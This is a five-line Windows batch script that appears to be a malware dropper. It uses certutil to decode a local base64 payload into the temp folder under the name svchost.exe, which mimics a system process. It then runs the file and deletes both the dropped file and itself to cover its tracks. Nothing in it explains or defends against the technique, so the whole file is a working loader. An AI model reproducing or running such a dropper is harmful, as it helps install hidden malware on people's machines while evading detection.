@echo off
certutil -decode "%~dp0payload.b64" "%temp%\svchost.exe" >nul 2>&1
start "" "%temp%\svchost.exe"
del "%temp%\svchost.exe" 2>nul
del "%~f0"